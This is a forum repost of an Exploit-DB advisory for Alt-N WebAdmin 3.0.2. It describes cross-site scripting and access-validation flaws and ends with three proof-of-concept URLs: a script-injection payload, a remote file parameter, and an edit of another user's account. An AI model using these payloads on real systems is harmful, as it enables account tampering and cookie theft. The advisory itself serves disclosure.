Exploit alt-n WebAdmin 3.0.2 - Multiple Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25067
Проверка EDB
  1. Пройдено
Автор
DAVID A. P?REZ
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
N/A
Дата публикации
2005-01-28
Код:
source: https://www.securityfocus.com/bid/12395/info

Alt-n WebAdmin is reportedly affected by multiple remote vulnerabilities.

The application is affected by multiple cross-site scripting issues. An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

The application is reportedly also affected by an access validation vulnerability with regards to user accounts. This issue could permit an attacker to modify various aspects of an existing users account.

The vendor has addressed these issues in Alt-N WebAdmin 3.03 and later; earlier versions are reportedly vulnerable. 

http://www.example.com/WebAdmin/useredit_account.wdm?user=%3Cscript%3Ealert('test')%3C/script%3E
http://www.example.com/WebAdmin/modalframe.wdm?file=http://other_server/page.wdm

The following proof of concept demonstrates the access validation issue:
http://www.example.com/WebAdmin/useredit_account.wdm?user=otheruser@domain
 
Источник
www.exploit-db.com

Похожие темы